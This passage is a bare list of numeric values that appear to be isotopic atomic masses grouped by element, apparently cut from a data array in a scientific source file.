12.034404895, 13.024812213, 14.00859625, 15.003065617, 15.99491461956,
16.999131703, 17.999161001, 19.00358013, 20.004076742, 21.008655886,
22.009966947, 23.015687659, 24.020472917, 25.029460, 26.038340, 27.048260,
28.057810, 18.998403224, 14.035060, 15.018009103, 16.011465724,
17.002095237, 18.000937956, 18.998403224, 19.999981315, 20.999948951,
22.002998815, 23.003574631, 24.008115485, 25.012101747, 26.019615555,
27.026760086, 28.035670, 29.043260, 30.052500, 31.060429, 19.99244017542,
16.025761262, 17.017671504, 18.005708213, 19.001880248, 19.99244017542,
20.993846684, 21.991385113, 22.994466904, 23.993610779, 24.997736888,
26.000461206, 27.007589903, 28.012071575, 29.019385933, 30.024801045,
31.033110, 32.040020, 33.049380, 34.057028, 22.98976928087, 18.025969,
19.013877499, 20.007351328, 20.997655206, 21.994436425, 22.98976928087,
23.990962782, 24.989953968, 25.992633, 26.994076788, 27.998938, 29.002861,
30.008976, 31.013585452, 32.02046656, 33.026719756, 34.035170, 35.042493,
36.051480, 37.059340, 23.985041699, 19.03547, 20.018862545, 21.01171291,
21.999573843, 22.994123669, 23.985041699, 24.985836917, 25.982592929,
26.984340585, 27.983876825, 28.9886, 29.990434, 30.996546, 31.998975,
33.005254, 34.009456424, 35.017340, 36.023000, 37.031400, 38.037570,
39.046772, 40.053930, 26.981538627, 21.028040, 22.019520, 23.007267432,
23.999938865, 24.990428095, 25.986891692, 26.981538627, 27.981910306,
28.980445046, 29.982960256, 30.983946619, 31.988124489, 32.990843336,
33.996851837, 34.999860235, 36.006207204, 37.01067782, 38.017231021,
39.02297, 40.031450, 41.038330, 42.046890, 27.97692653246, 22.034530,
23.025520, 24.011545616, 25.004105574, 25.992329921, 26.986704905,
27.97692653246, 28.9764947, 29.973770171, 30.975363227,
31.974148082, 32.97800022, 33.978575524, 34.984583575, 35.986599477,
36.99293608, 37.995633601, 39.002070013, 40.005869121, 41.01456,
42.019790, 43.028660, 44.035260, 30.973761629, 24.034350, 25.020260,
26.011780, 26.999230236, 27.992314761, 28.981800606, 29.978313789,
30.973761629, 31.973907274, 32.971725543, 33.973636257, 34.973314117,
35.97825968, 36.979608946, 37.984156827, 38.986179475, 39.991296951,
40.994335435, 42.001007913, 43.00619, 44.012990, 45.019220, 46.027380,
31.972070999, 26.027880, 27.018833, 28.004372763, 28.996608049,
29.984903249, 30.979554728, 31.972070999, 32.971458759, 33.967866902,
34.969032161, 35.96708076, 36.971125567, 37.971163317, 38.975134306,
39.975451728, 40.979582149, 41.981022419, 42.98715479, 43.99021339,
44.996508112, 46.000750, 47.008590, 48.014170, 49.023619, 34.968852682,
28.028510, 29.014110, 30.004770, 30.992413086, 31.985689901, 32.977451887,
33.973762819, 34.968852682, 35.968306981, 36.965902591, 37.968010425,
38.968008164, 39.970415472, 40.970684525, 41.973254804, 42.974054403,
43.978281071, 44.980286886, 45.98421004, 46.988710, 47.994950, 49.000320,
50.007840, 51.014490, 39.96238312251, 30.021560, 31.012123, 31.997637984,
32.989925709, 33.980271244, 34.975257585, 35.967545105, 36.96677632,
37.962732394, 38.964313231, 39.96238312251, 40.964500611, 41.963045736,
42.965636056, 43.964924033, 44.968039956, 45.968094129, 46.972186792,
47.974540, 48.980520, 49.984430, 50.991630, 51.996780, 53.004940,
38.963706679, 32.021920, 33.007260, 33.998410, 34.988009692, 35.981292235,
36.973375889, 37.969081184, 38.963706679, 39.963998475, 40.961825762,
41.96240281, 42.96071554, 43.961556804, 44.960699493, 45.961976864,
46.961678473, 47.965513535, 48.967450928, 49.972783355, 50.976380,
51.982610, 52.987120, 53.994200, 54.999710, 39.962590983, 34.014120,
35.004940, 35.993087063, 36.985870269, 37.976318452, 38.970719725,
39.962590983, 40.962278062, 41.958618014, 42.958766628, 43.955481754,
44.956186566, 45.953692587, 46.954546006, 47.952534177, 48.955674148,
49.957518962, 50.961499214, 51.9651, 52.970050, 53.974350, 54.980550,
55.985570, 56.992356, 44.955911909, 36.014920, 37.003050, 37.994700,
38.984790002, 39.977967407, 40.969251125, 41.965516429, 42.961150658,
43.959402752, 44.955911909, 45.95517189, 46.952407508, 47.952231468,
48.950023975, 49.952187685, 50.953603368, 51.956675468, 52.959610,
53.963264561, 54.968243949, 55.972870, 56.977790, 57.983710, 58.989220,
59.995710, 47.947946281, 38.009770, 39.001610, 39.990498838, 40.983145,
41.973030902, 42.968522499, 43.959690069, 44.958125616, 45.952631555,
46.951763088, 47.947946281, 48.947869982, 49.944791194, 50.946614955,
51.946897311, 52.949727171, 53.951052401, 54.955265056, 55.958199639,
56.963989137, 57.966970, 58.972930, 59.976760, 60.983200, 61.987490,
62.994420, 50.943959507, 40.011090, 40.999780, 41.991230, 42.980650,
43.97411, 44.965775808, 45.960200481, 46.95490894, 47.952253707,
48.948516101, 49.947158485, 50.943959507, 51.944775479, 52.944337979,
53.946439854, 54.947233701, 55.950530966, 56.952561432, 57.956834136,
58.960207407, 59.965026862, 60.968480, 61.973780, 62.977550, 63.983470,
64.987920, 51.940507472, 42.006430, 42.997710, 43.985549, 44.97964,
45.968358635, 46.962900046, 47.954031716, 48.951335721, 49.946044205,
50.944767431, 51.940507472, 52.940649386, 53.938880395, 54.940839672,
55.940653139, 56.943613013, 57.944353129, 58.948586367, 59.950076033,
60.954717204, 61.95661319, 62.961860, 63.964410, 64.970160, 65.973380,
66.979550, 54.938045141, 44.006870, 44.994510, 45.986720, 46.976100,
47.96852, 48.959618005, 49.95423823, 50.948210787, 51.945565464,
52.941290117, 53.940358854, 54.938045141, 55.93890491, 56.938285378,
57.939981549, 58.940440237, 59.942911246, 60.944652638, 61.94842822,
62.95023999, 63.95424909, 64.956336065, 65.961080, 66.964140, 67.969300,
68.972840, 55.934937475, 45.014578, 46.000810, 46.992890, 47.980504,
48.973610, 49.962988982, 50.956819538, 51.948113875, 52.945307942,
53.939610501, 54.938293357, 55.934937475, 56.935393969, 57.933275558,
58.934875464, 59.934071683, 60.936745281, 61.936767442, 62.940369091,
63.941201265, 64.94538027, 65.946780638, 66.950947244, 67.9537, 68.958780,
69.961460, 70.966720, 71.969620, 58.933195048, 47.011490, 48.001760,
48.989720, 49.981540, 50.970720, 51.963590, 52.954218896, 53.948459635,
54.941999029, 55.939839278, 56.936291373, 57.935752814, 58.933195048,
59.933817059, 60.932475763, 61.934050563, 62.933611611, 63.935809908,
64.93647846, 65.939762004, 66.940889529, 67.944873058, 68.94632, 69.951,
70.9529, 71.957810, 72.960240, 73.965380, 74.968330, 57.935342907,
48.019750, 49.009660, 49.995930, 50.987720, 51.975680, 52.968470,
53.957905495, 54.951330251, 55.942132022, 56.939793526, 57.935342907,
58.934346705, 59.930786372, 60.931056033, 61.928345115, 62.929669374,
63.927965959, 64.930084304, 65.929139334, 66.931569414, 67.931868789,
68.935610269, 69.9365, 70.940736283, 71.942092682, 72.946470, 73.948070,
74.952870, 75.955330, 76.960550, 77.963180, 62.929597474, 51.997180,
52.985550, 53.976710, 54.966050, 55.958560, 56.949211078, 57.944538499,
58.939498028, 59.93736503, 60.933457821, 61.932583745, 62.929597474,
63.929764183, 64.927789485, 65.928868813, 66.927730314, 67.929610889,
68.929429269, 69.932392343, 70.932676833, 71.935820307, 72.936675282,
73.939874862, 74.9419, 75.945275026, 76.947850, 77.951960, 78.954560,
79.960870, 63.929142222, 53.992950, 54.983980, 55.972380, 56.964788,
57.954591555, 58.949263764, 59.941827035, 60.939510635, 61.934329764,
62.933211566, 63.929142222, 64.929240984, 65.926033419, 66.927127345,
67.924844154, 68.926550281, 69.925319274, 70.927721599, 71.926857951,
72.929779104, 73.929458609, 74.932936741, 75.93329357, 76.936958967,
77.938440216, 78.942652, 79.944342348, 80.950480, 81.954420, 82.961030,
68.925573587, 55.994910, 56.982930, 57.974250, 58.963370, 59.957060,
60.949446287, 61.944175238, 62.939294196, 63.936838747, 64.932734754,
65.93158901, 66.928201703, 67.927980084, 68.925573587, 69.926021972,
70.924701349, 71.926366268, 72.925174682, 73.926945762, 74.926500246,
75.928827626, 76.9291543, 77.93160818, 78.93289326, 79.936515781,
80.937752355, 81.942990, 82.946980, 83.952650, 84.957000, 85.963120,
73.921177767, 57.991010, 58.981750, 59.970190, 60.963790, 61.954650,
62.949640, 63.941653, 64.939436406, 65.933843453, 66.93273407,
67.92809424, 68.927964533, 69.924247381, 70.924950954, 71.922075815,
72.923458945, 73.921177767, 74.922858948, 75.921402557, 76.923548591,
77.922852739, 78.925400995, 79.925372392, 80.928820467, 81.929549725,
82.934620, 83.937470, 84.943030, 85.946490, 86.952510, 87.956910,
88.963830, 74.921596478, 59.993130, 60.980620, 61.973200, 62.963690,
63.957572, 64.949564, 65.94471, 66.939186071, 67.936769069, 68.932273675,
69.930924826, 70.927112428, 71.926752283, 72.923824844, 73.923928692,
74.921596478, 75.922394021, 76.920647286, 77.921827281, 78.920947934,
79.922533816, 80.922132287, 81.924504067, 82.924980024, 83.929058,
84.932020, 85.936500, 86.939900, 87.944940, 88.949390, 89.955500,
90.960430, 91.966800, 79.916521271, 64.964660, 65.955210, 66.950090,
67.941798, 68.939557817, 69.933390644, 70.932241822, 71.927112352,
72.926765345, 73.922476436, 74.922523368, 75.919213597, 76.919914038,
77.91730909, 78.918499098, 79.916521271, 80.917992474, 81.916699401,
82.919118473, 83.918462354, 84.922245053, 85.924271579, 86.928521358,
87.931423998, 88.936450, 89.939960, 90.945960, 91.949920, 92.956290,
93.960490, 78.918337087, 66.964790, 67.958516, 68.950106, 69.944792,
70.93874, 71.936644572, 72.931691524, 73.929891034, 74.925776207,
75.924541469, 76.921379082, 77.921145706, 78.918337087, 79.918529296,
80.916290563, 81.916804119, 82.915180421, 83.916478974, 84.915608403,
85.918797577, 86.920711324, 87.924065926, 88.926385334, 89.930627737,
90.933968095, 91.939258714, 92.943050, 93.948680, 94.952870, 95.958530,
96.962800, 85.910610729, 68.965180, 69.955259, 70.949625738, 71.942092038,
72.939289195, 73.933084369, 74.930945746, 75.925910078, 76.92467,
77.920364783, 78.920082431, 79.916378965, 80.916592015, 81.9134836,
82.914136099, 83.911506687, 84.912527331, 85.910610729, 86.913354862,
87.914446969, 88.917630581, 89.919516555, 90.923445215, 91.92615621,
92.931274357, 93.934360, 94.939840, 95.943070, 96.948560, 97.951910,
98.957600, 99.961140, 84.911789737, 70.965320, 71.959080, 72.950561,
73.944264751, 74.93857, 75.935072226, 76.930408, 77.928141, 78.92398946,
79.92251925, 80.918995913, 81.918208598, 82.915109701, 83.914384821,
84.911789737, 85.911167419, 86.909180526, 87.911315588, 88.912278016,
89.914801694, 90.916536958, 91.9197289, 92.922041876, 93.926404946,
94.929302889, 95.934272637, 96.937351916, 97.941790668, 98.945379283,
99.949870, 100.953196445, 101.958870, 87.905612124, 72.965970,
73.956310, 74.949949568, 75.941766782, 76.937944782, 77.93218,
78.929708, 79.924521013, 80.923211846, 81.918401639, 82.917556701,
83.913425275, 84.912932803, 85.909260204, 86.908877124, 87.905612124,
88.907450675, 89.907737888, 90.910203095, 91.911037858, 92.914025634,
93.915361312, 94.919358766, 95.921696802, 96.926152923, 97.928452934,
98.933240926, 99.935351911, 100.940517888, 101.943018987, 102.948950,
103.952330, 104.958580, 88.905848295, 75.958450, 76.949645, 77.943610,
78.937351634, 79.93428, 80.929127468, 81.926792451, 82.922354243,
83.920388264, 84.916433039, 85.914885576, 86.91087573, 87.909501146,
88.905848295, 89.907151886, 90.907304791, 91.908949143, 92.909582713,
93.911595245, 94.912820621, 95.915891343, 96.918133995, 97.92220302,
98.924636204, 99.927756586, 100.93031385, 101.933555695, 102.936730,
103.941050, 104.944870, 105.949790, 106.954140, 107.959480,
89.904704416, 77.955230, 78.949160, 79.9404, 80.937210026, 81.931087,
82.928653801, 83.923250, 84.921471182, 85.916473591, 86.914816252,
87.910226904, 88.9088895, 89.904704416, 90.905645767, 91.905040847,
92.906476006, 93.906315192, 94.9080426, 95.908273386, 96.910953109,
97.912734892, 98.916512106, 99.917761889, 100.921140415, 101.922981285,
102.926599606, 103.928780, 104.933050, 105.935910, 106.940750,
107.943960, 108.949240, 109.952870, 92.906378058, 80.949030,
81.943130, 82.936705382, 83.933570, 84.927912447, 85.925038326,
86.920361108, 87.918332163, 88.913418245, 89.911264845,
90.906996243, 91.907193888, 92.906378058, 93.907283888, 94.906835792,
95.908100647, 96.908098556, 97.910328412, 98.911618375, 99.914181619,
100.915252025, 101.918037614, 102.919143842, 103.922464701,
104.923936545, 105.927970, 106.930310, 107.934840, 108.937630,
109.942440, 110.945650, 111.950830, 112.954700, 97.905408169, 82.948740,
83.940090, 84.936550, 85.930695904, 86.927326502, 87.921953241,
88.919480009, 89.913936896, 90.911750194, 91.906810991, 92.90681261,
93.905088269, 94.905842129, 95.904679477, 96.906021465, 97.905408169,
98.90771187, 99.907477336, 100.910347001, 101.91029736, 102.913207142,
103.913763625, 104.91697461, 105.918136802, 106.921692604, 107.923453,
108.927810, 109.929730, 110.934410, 111.936840, 112.941880, 113.944920,
114.950290, 98.906254747, 84.948830, 85.942880, 86.936530, 87.932678,
88.927167, 89.923556564, 90.918427639, 91.915260166, 92.910248984,
93.909657002, 94.907657084, 95.907871383, 96.906365358, 97.907215966,
98.906254747, 99.90765778, 100.907314659, 101.909215019, 102.909181351,
103.911447454, 104.911660566, 105.914357927, 106.915079572, 107.918461226,
108.919982665, 109.923820483, 110.92569283, 111.929146493, 112.931590,
113.935880, 114.938690, 115.943370, 116.946480, 117.951480, 101.904349312,
86.949180, 87.940260, 88.936110, 89.929890, 90.926292, 91.920120,
92.917052034, 93.911359711, 94.910412929, 95.907597835, 96.9075547,
97.905287132, 98.905939302, 99.904219476, 100.905582087, 101.904349312,
102.906323847, 103.905432701, 104.907752866, 105.907329433,
106.909905089, 107.910173465, 108.913203233, 109.914136041, 110.917696,
111.918965, 112.922487194, 113.924281, 114.928686173, 115.930810,
116.935580, 117.937820, 118.942840, 119.945310, 102.905504292,
88.948837, 89.942870, 90.936550, 91.931980, 92.925740, 93.921698,
94.91589874, 95.914460631, 96.911336797, 97.910708158, 98.908132104,
99.90812155, 100.906163625, 101.906843196, 102.905504292, 103.906655518,
104.905693821, 105.907287135, 106.906748423, 107.908728018, 108.908737289,
109.911136411, 110.911585913, 111.914394159, 112.915530627, 113.918806,
114.920334, 115.924062, 116.925980, 117.930070, 118.932110, 119.936410,
120.938720, 121.943210, 105.903485715, 90.949110, 91.940420, 92.935910,
93.928770, 94.924690, 95.918164359, 96.916479073, 97.912720902,
98.911767833, 99.908505886, 100.908289242, 101.905608544, 102.906087307,
103.904035834, 104.90508492, 105.903485715, 106.905133481, 107.903891701,
108.905950451, 109.905153254, 110.907670734, 111.907314058, 112.910152908,
113.910362638, 114.913683824, 115.914158662, 116.917841338, 117.9189843,
118.923110, 119.924691878, 120.928870, 121.930550, 122.934930, 123.936880,
106.90509682, 92.949780, 93.942780, 94.935480, 95.930680, 96.923972412,
97.921566201, 98.917597178, 99.916104255, 100.912802233, 101.911685,
102.90897272, 103.908629157, 104.906528661, 105.906668921, 106.90509682,
107.905955556, 108.904752292, 109.906107231, 110.905291157, 111.907004814,
112.906566579, 113.908803704, 114.908762698, 115.911359933, 116.911684562,
117.914582768, 118.915665059, 119.918787384, 120.919848046, 121.923530,
122.924900, 123.928640, 124.930430, 125.934500, 126.936770, 127.941170,
128.943690, 129.950448, 113.90335854, 94.949870, 95.939770, 96.934940,
97.927395546, 98.925010, 99.920289525, 100.918681538, 101.914462258,
102.913419246, 103.909849475, 104.909467905, 105.90645941, 106.906617928,
107.904183683, 108.904982293, 109.90300207, 110.904178107, 111.902757809,
112.904401662, 113.90335854, 114.905430969, 115.904755809, 116.907218618,
117.90691453, 118.909921597, 119.909850129, 120.912977363, 121.913332432,
122.917002999, 123.917647616, 124.92124637, 125.922353321, 126.926443864,
127.927762285, 128.932150, 129.933901937, 130.940670, 131.945550,
114.903878484, 96.949540, 97.942140, 98.934220, 99.931110851,
100.926340, 101.924090238, 102.919914188, 103.918296171, 104.91467354,
105.913465411, 106.9102951, 107.90969818, 108.907150507, 109.907165274,
110.905103278, 111.905532331, 112.904057761, 113.904913876,
114.903878484, 115.905259703, 116.904513564, 117.906354367, 118.90584535,
119.907959608, 120.907845822, 121.91027601, 122.910438276, 123.913175231,
124.913600588, 125.916463857, 126.917353091, 127.920172328, 128.92169698,
129.924970049, 130.926851767, 131.93299026, 132.937810, 133.944150,
134.949330, 119.902194676, 98.949330, 99.939044343, 100.936060,
101.930295324, 102.928100, 103.923143223, 104.921349437, 105.91688062,
106.915644329, 107.911925378, 108.911283214, 109.907842791, 110.90773446,
111.904818207, 112.905170577, 113.902778869, 114.903342397, 115.90174053,
116.902951656, 117.901603167, 118.90330763, 119.902194676, 120.90423548,
121.903439046, 122.905720838, 123.905273946, 124.907784125, 125.90765328,
126.910360024, 127.910536624, 128.913479, 129.913967295, 130.916999769,
131.917815713, 132.923829249, 133.928291765, 134.934730, 135.939340,
136.945990, 120.903815686, 102.939690, 103.936472, 104.931486348,
105.928791, 106.924150, 107.922160, 108.918132426, 109.916753, 110.913163,
111.912398009, 112.909371672, 113.909269, 114.906598, 115.906793629,
116.904835941, 117.905528731, 118.903942009, 119.905072427, 120.903815686,
121.905173651, 122.90421397, 123.905935743, 124.905253818, 125.90724748,
126.906923609, 127.909169001, 128.909148442, 129.911656324, 130.911982275,
131.914466896, 132.91525163, 133.920379744, 134.925165771, 135.930350,
136.935310, 137.940790, 138.945980, 129.906224399, 104.943640,
105.937504237, 106.935006, 107.929444597, 108.927415515, 109.922407316,
110.921110692, 111.917013672, 112.915891, 113.912089, 114.911902,
115.90846, 116.908644719, 117.905827581, 118.906403645, 119.904020222,
120.904936424, 121.903043898, 122.904270029, 123.902817896, 124.904430731,
125.903311696, 126.905226336, 127.904463056, 128.906598238, 129.906224399,
130.908523864, 131.90855316, 132.910955306, 133.911368737, 134.916448592,
135.920101246, 136.925322954, 137.929220, 138.934730, 139.938850,
140.944650, 141.949080, 126.904472681, 107.943475, 108.938149417,
109.935242, 110.930276, 111.927970, 112.923640583, 113.921850, 114.918048,
115.916808633, 116.91365, 117.913074, 118.910074, 119.910048173,
120.907366811, 121.907589284, 122.905588965, 123.906209852, 124.904630164,
125.905624153, 126.904472681, 127.905809443, 128.904987722, 129.906674247,
130.906124609, 131.907997381, 132.907796939, 133.909744465, 134.910048121,
135.914653993, 136.91787084, 137.922349591, 138.926099478, 139.931000,
140.935030, 141.940180, 142.944560, 143.949990, 131.904153457, 109.944278068,
110.941602, 111.935623112, 112.933341174, 113.927980306, 114.92629392,
115.921581087, 116.920358735, 117.916178655, 118.915410688, 119.911784244,
120.911461829, 121.908367632, 122.90848191, 123.905893003, 124.906395464,
125.904273634, 126.905183723, 127.903531275, 128.904779435, 129.903508007,
130.905082362, 131.904153457, 132.905910722, 133.905394464, 134.907227495,
135.907218794, 136.911562125, 137.913954475, 138.918792936, 139.921640943,
140.926648049, 141.92970959, 142.935110, 143.938510, 144.944070, 145.947750,
146.953560, 132.905451932, 111.950301, 112.944493274, 113.941450, 114.935910,
115.933367, 116.928670701, 117.926559494, 118.922377304, 119.920677253,
120.917229209, 121.916113434, 122.912996036, 123.912257798, 124.90972827,
125.909451977, 126.907417525, 127.907748866, 128.906064426, 129.906708552,
130.905463926, 131.90643426, 132.905451932, 133.906718475, 134.905977008,
135.907311576, 136.907089473, 137.911016704, 138.913363999, 139.917282354,
140.920045752, 141.924298927, 142.92735175, 143.932076914, 144.93552617,
145.940289423, 146.944155008, 147.949218153, 148.952930, 149.958170,
150.962190, 137.905247237, 113.950675405, 114.947370, 115.941380,
116.938499, 117.933040, 118.930659661, 119.926044974, 120.924054499,
121.919904, 122.918781036, 123.915093603, 124.914472912, 125.911250177,
126.911093797, 127.908317698, 128.908679439, 129.906320811, 130.906941118,
131.905061288, 132.90600749, 133.904508383, 134.905688591, 135.904575945,
136.905827384, 137.905247237, 138.908841341, 139.910604505, 140.914411009,
141.91645341, 142.920626719, 143.922952853, 144.927627032, 145.930219572,
146.934945, 147.937720047, 148.942580, 149.945680, 150.950810, 151.954270,
152.959610, 138.906353267, 116.950068, 117.946730, 118.940990, 119.938070,
120.933010, 121.930710, 122.926240, 123.924574275, 124.920816034,
125.919512667, 126.916375448, 127.915585177, 128.912692815, 129.912368724,
130.91007, 131.910101145, 132.908218, 133.908514011, 134.906976844,
135.907635536, 136.906493598, 137.90711193, 138.906353267, 139.909477645,
140.910962152, 141.91407913, 142.91606272, 143.919599647, 144.921645401,
145.92579346, 146.928235284, 147.932228868, 148.934734, 149.938770,
150.941720, 151.946250, 152.949620, 153.954500, 154.958350, 139.905438706,
118.952760, 119.946640, 120.943420, 121.937910, 122.935400, 123.930410,
124.928440, 125.923971, 126.922731, 127.918911, 128.918102, 129.914736,
130.914422, 131.911460487, 132.91151502, 133.908924821, 134.909151396,
135.907172422, 136.907805577, 137.905991321, 138.906652651, 139.905438706,
140.90827627, 141.909244205, 142.91238591, 143.913647336, 144.917233135,
145.918759009, 146.922673954, 147.92443241, 148.928399883, 149.930408931,
150.933976196, 151.936540, 152.940580, 153.943420, 154.948040, 155.951260,
156.956340, 140.907652769, 120.955364, 121.951810, 122.945960, 123.942960,
124.937830, 125.935310, 126.930830, 127.928791, 128.925095, 129.92359,
130.920259, 131.919255, 132.916330532, 133.915711737, 134.913111745,
135.912691611, 136.910705455, 137.910754636, 138.908938399, 139.909075874,
140.907652769, 141.910044806, 142.910816926, 143.913305245, 144.9145117,
145.917644336, 146.918995992, 147.922135026, 148.923717651, 149.926672997,
150.928318618, 151.931499225, 152.933838905, 153.937518153, 154.940120,
155.944270, 156.947430, 157.951980, 158.955500, 141.907723297, 123.952230,
124.948880, 125.943220, 126.940500, 127.935390, 128.933188, 129.928506,
130.927247, 131.923321237, 132.922348, 133.918790181, 134.91818116,
135.914976035, 136.914567137, 137.911949961, 138.911978288, 139.909552,
140.909609854, 141.907723297, 142.90981429, 143.910087274, 144.912573636,
145.913116939, 146.916100441, 147.916893288, 148.920148842, 149.920890888,
150.923828929, 151.924682219, 152.927698232, 153.929477307, 154.932932,
155.935018114, 156.939030, 157.941600, 158.946090, 159.949090, 160.953880,
144.912749023, 125.957520, 126.951630, 127.948420, 128.943160, 129.940450,
130.935870, 131.933750, 132.929782, 133.928353, 134.924876, 135.923565829,
136.920479493, 137.919548281, 138.916804082, 139.916041789, 140.913555054,
141.912874471, 142.910932616, 143.912590843, 144.912749023, 145.914696305,
146.915138545, 147.917474618, 148.918334155, 149.920983561, 150.921206973,
151.923496795, 152.924116889, 153.926463943, 154.928101267, 155.931056736,
156.933039369, 157.936561407, 158.938970, 159.942990, 160.945860,
161.950290, 162.953680, 151.919732425, 127.958080, 128.954640, 129.948920,
130.946110, 131.940690, 132.938670, 133.933970, 134.93252, 135.928275527,
136.926971746, 137.923243961, 138.922296605, 139.918994687, 140.918476488,
141.915197641, 142.914628338, 143.911999478, 144.913410353, 145.9130409,
146.914897923, 147.914822674, 148.917184735, 149.917275539, 150.919932409,
151.919732425, 152.922097356, 153.922209273, 154.924640161, 155.925527887,
156.928358717, 157.929991317, 158.933211271, 159.935140, 160.938830,
161.941220, 162.945360, 163.948280, 164.952980, 152.921230339, 129.963569,
130.957753, 131.954370, 132.949240, 133.946510, 134.941820, 135.939600,
136.935570, 137.933709, 138.92979228, 139.928087607, 140.92493072,
141.923434945, 142.920297509, 143.918816823, 144.916265237, 145.917205817,
146.916746111, 147.918085895, 148.917931238, 149.919701819, 150.919850161,
151.921744534, 152.921230339, 153.922979237, 154.92289326, 155.924752249,
156.925423647, 157.927845302, 158.929088861, 159.931971, 160.933680,
161.937040, 162.939210, 163.942990, 164.945720, 165.949970, 166.953210,
157.924103912, 133.955370, 134.952570, 135.947340, 136.945020, 137.940120,
138.938240, 139.933674, 140.932126, 141.928116, 142.92674951, 143.922963,
144.921709252, 145.918310608, 146.91909442, 147.918114524, 148.919340915,
149.918658876, 150.920348482, 151.919790996, 152.921749543, 153.920865598,
154.922622022, 155.922122743, 156.923960135, 157.924103912, 158.926388658,
159.927054146, 160.929669211, 161.930984751, 162.933990, 163.935860,
164.939380, 165.941600, 166.945570, 167.948360, 168.952870, 158.925346757,
135.961380, 136.955980, 137.953160, 138.948290, 139.945805049, 140.941448,
141.938744, 142.935121, 143.933045, 144.929274, 145.927246584, 146.924044585,
147.924271701, 148.923245909, 149.923659686, 150.923102543, 151.924074438,
152.923434588, 153.924678019, 154.923505236, 155.924747213, 156.924024604,
157.925413137, 158.925346757, 159.927167606, 160.927569919, 161.929488234,
162.930647536, 163.933350838, 164.934880, 165.937991959, 166.940050,
167.943640, 168.946220, 169.950250, 170.953300, 163.929174751, 137.962490,
138.959540, 139.954010, 140.951350, 141.946366, 142.943830, 143.939254,
144.937425, 145.932845369, 146.9310915, 147.927149831, 148.927304787,
149.925585184, 150.926184601, 151.9247183, 152.92576467, 153.924424457,
154.925753775, 155.92428311, 156.925466095, 157.924409487, 158.925739214,
159.925197517, 160.926933364, 161.926798447, 162.928731159, 163.929174751,
164.931703333, 165.932806741, 166.935655462, 167.937128769, 168.940307614,
169.942390, 170.946200, 171.948760, 172.953000, 164.93032207, 139.968539,
140.963098, 141.959770, 142.954610, 143.951480, 144.947200, 145.944640,
146.940056, 147.937718, 148.933774771, 149.933496182, 150.931688142,
151.931713714, 152.930198789, 153.930601579, 154.929103491, 155.929839,
156.928256188, 157.928941007, 158.927711959, 159.928729478, 160.927854776,
161.929095504, 162.928733903, 163.930233507, 164.93032207, 165.932284162,
166.933132633, 167.935515708, 168.936872273, 169.939618929, 170.94146515,
171.944820, 172.947290, 173.951150, 174.954050, 165.930293061, 142.966340,
143.960380, 144.957390, 145.952000, 146.949490, 147.944550, 148.942306,
149.937913839, 150.937448903, 151.935050389, 152.935063492, 153.932783081,
154.933208949, 155.931064698, 156.931916, 157.929893474, 158.930684066,
159.929083292, 160.929995309, 161.928778264, 162.930032749, 163.929200229,
164.930726003, 165.930293061, 166.932048159, 167.932370224, 168.934590364,
169.935464312, 170.938029808, 171.939356113, 172.942400, 173.944230,
174.947770, 175.950080, 176.954050, 168.93421325, 144.970073, 145.966425,
146.960961, 147.957840, 148.952720, 149.949960, 150.94548349, 151.944422,
152.942012112, 153.941567808, 154.939199459, 155.938979933, 156.936973,
157.936979525, 158.934975, 159.935262801, 160.933549, 161.933994682,
162.932651124, 163.93356, 164.932435492, 165.933554131, 166.932851622,
167.934172776, 168.93421325, 169.935801397, 170.93642944, 171.938400044,
172.939603607, 173.942168605, 174.943836853, 175.946994685, 176.949040,
177.952640, 178.955340, 173.938862089, 147.967420, 148.964040, 149.958420,
150.955400769, 151.950288919, 152.949480, 153.946393928, 154.945782332,
155.942818215, 156.942627848, 157.939865617, 158.940050099, 159.937552344,
160.937901678, 161.93576821, 162.936334305, 163.934489416, 164.935279,
165.933882042, 166.934949605, 167.933896895, 168.935189802, 169.934761837,
170.936325799, 171.936381469, 172.938210787, 173.938862089, 174.94127645,
175.942571683, 176.945260822, 177.94664668, 178.950170, 179.952330,
180.956150, 174.940771819, 149.973228, 150.967577, 151.964120,
152.958767331, 153.957522, 154.954316216, 155.953032523, 156.9500983,
157.949313283, 158.946628776, 159.946033, 160.943572, 161.943277288,
162.941179, 163.941339, 164.939406724, 165.939859, 166.93827,
167.938739111, 168.937651439, 169.938474968, 170.937913136, 171.939085669,
172.938930602, 173.94033748, 174.940771819, 175.94268631, 176.943758055,
177.945954559, 178.947327443, 179.94988116, 180.951970, 181.955040,
182.957570, 183.960910, 179.946549953, 152.970690, 153.964860, 154.963390,
155.959364025, 156.958396, 157.954799366, 158.95399487, 159.950684379,
160.950274844, 161.947210498, 162.947089, 163.944367284, 164.944567,
165.94218, 166.9426, 167.940568, 168.941259, 169.939609, 170.940492,
171.939448301, 172.940513, 173.940046178, 174.941509181, 175.941408631,
176.943220651, 177.943698766, 178.945816145, 179.946549953, 180.949101246,
181.950554096, 182.953530439, 183.955446515, 184.958820, 185.960890,
186.964590, 187.966850, 180.947995763, 154.974592, 155.972303,
156.968192445, 157.966699, 158.963018173, 159.961486056, 160.958417,
161.957291859, 162.954330271, 163.953534, 164.950772514, 165.950512,
166.948093, 167.948047, 168.946011, 169.946175, 170.944476, 171.944895,
172.94375, 173.944454, 174.943737, 175.944857, 176.944472403,
177.945778221, 178.945929535, 179.947464831, 180.947995763, 181.950151849,
182.951372616, 183.954007966, 184.955559375, 185.958552023, 186.960530,
187.963700, 188.965830, 189.969230, 183.950931188, 157.974562, 158.972918,
159.968478805, 160.967357, 161.963497417, 162.962523542, 163.958954382,
164.958279949, 165.955027253, 166.954816014, 167.951808394, 168.95177879,
169.949228482, 170.949451, 171.947292, 172.947689, 173.946079, 174.946717,
175.945634, 176.946643, 177.945876236, 178.947070447, 179.946704459,
180.948197248, 181.948204156, 182.950222951, 183.950931188, 184.953419264,
185.954364127, 186.957160466, 187.958489105, 188.961912868, 189.963181378,
190.966600, 191.968170, 186.955753109, 159.982115, 160.977589119,
161.976002, 162.972080535, 163.970323, 164.967088557, 165.965808,
166.962601, 167.961572608, 168.958791096, 169.958220071, 170.955716,
171.955422961, 172.953243, 173.953115, 174.951381, 175.951623, 176.950328,
177.950989, 178.949987641, 179.950789084, 180.950067916, 181.95121008,
182.950819841, 183.952520756, 184.952954982, 185.954986084, 186.955753109,
187.958114438, 188.959229007, 189.961817977, 190.963125242, 191.965960,
192.967470, 193.970420, 191.96148069, 161.984431, 162.982690,
163.978035649, 164.976762, 165.972690753, 166.971547969, 167.967803678,
168.96701927, 169.963577028, 170.963184819, 171.960023303, 172.959808409,
173.957062202, 174.956945835, 175.954806, 176.954965324, 177.953251241,
